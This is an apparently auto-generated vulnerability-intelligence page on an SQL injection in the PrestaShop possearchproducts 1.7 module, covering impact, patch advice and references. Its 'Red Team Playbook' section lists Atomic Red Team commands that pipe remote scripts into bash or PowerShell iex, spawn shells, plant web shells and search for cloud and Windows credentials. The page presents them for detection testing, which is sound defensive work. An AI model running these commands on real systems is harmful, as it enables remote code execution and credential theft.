CVE-2023-30192
Overview
This vulnerability is a SQL Injection flaw located in the PosSearch::find() function of the Prestashop possearchproducts module version 1.7. The root cause is the improper sanitization and validation of user-supplied input before incorporating it into SQL queries. This allows crafted input to manipulate the database query logic within the product search component of the module.
Vulnerability Description
Prestashop possearchproducts 1.7 is vulnerable to SQL Injection via PosSearch::find().
Impact
An unauthenticated attacker can exploit this vulnerability over the network to execute arbitrary SQL commands against the Prestashop database. This can lead to unauthorized data disclosure, modification, or deletion of sensitive information stored within the product search database. Given the CVSS vector AV:N/AC:L/PR:N/UI:N, the attack requires no privileges or user interaction, increasing the risk of widespread exploitation and data compromise within affected Prestashop installations.
Solution
Users of Prestashop possearchproducts version 1.7 should apply the security update provided by the module maintainers as detailed in the advisory at https://friends-of-presta.github.io/security-advisories/modules/2023/05/11/possearchproducts.html. The vendor recommends upgrading to a patched version of the module that properly sanitizes input in the PosSearch::find() function. No alternative workarounds are specified; prompt application of the official patch is advised to remediate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Prestashop possearchproducts module stems from a critical SQL Injection flaw within the PosSearch::find() function. This issue arises when user input is not properly sanitized before being incorporated into SQL queries. As a result, an attacker can manipulate the input to execute arbitrary SQL commands, potentially leading to unauthorized data access or modification. The severity of this vulnerability is underscored by its high CVSS score, indicating that it poses a significant risk to systems utilizing this module.
Attack vectors for this vulnerability are primarily web-based, where an attacker can exploit the flaw by crafting malicious requests to the affected application. For instance, an attacker could submit specially crafted input through search fields or other user input mechanisms that interact with the database. Successful exploitation could allow the attacker to retrieve sensitive information, such as user credentials, payment details, or other confidential data stored in the database. Furthermore, the attacker may also modify or delete data, leading to data integrity issues and potential service disruptions.
The real-world impact of such a vulnerability can be profound, particularly for e-commerce platforms that rely on Prestashop for their operations. Businesses could face significant financial losses due to data breaches, loss of customer trust, and potential legal ramifications stemming from non-compliance with data protection regulations. Additionally, the reputational damage incurred from a successful attack could have long-lasting effects, deterring customers from engaging with the brand. The potential for data exfiltration and the subsequent misuse of sensitive information further amplifies the business risks associated with this vulnerability.
To effectively detect and mitigate the risks associated with this SQL Injection vulnerability, organizations should implement a multi-layered security approach. Regular security assessments, including code reviews and penetration testing, can help identify and remediate vulnerabilities before they can be exploited. Employing web application firewalls (WAFs) can provide an additional layer of protection by filtering out malicious traffic. Furthermore, ensuring that all user inputs are properly validated and sanitized is crucial in preventing SQL Injection attacks. Organizations should also maintain up-to-date backups and incident response plans to minimize the impact of any successful exploitation.
In conclusion, the SQL Injection vulnerability within the Prestashop possearchproducts module represents a significant threat to businesses utilizing this platform. The potential for unauthorized data access, coupled with the severe implications of a successful attack, necessitates immediate attention and action. By adopting robust security practices and fostering a culture of security awareness, organizations can better protect themselves against such vulnerabilities and mitigate the associated risks.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Prestashop | Possearchproducts | 1.7 |
cpe:2.3:a:prestashop:possearchproducts:1.7:*:*:*:*:prestashop:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-30192 |
| themeforest.net |
GitHub CVE
|
https://themeforest.net/user/posthemes/portfolio |
| friends-of-presta.github.io |
GitHub CVE
|
https://friends-of-presta.github.io/security-advisories/modules/2023/05/11/possearchproducts.html |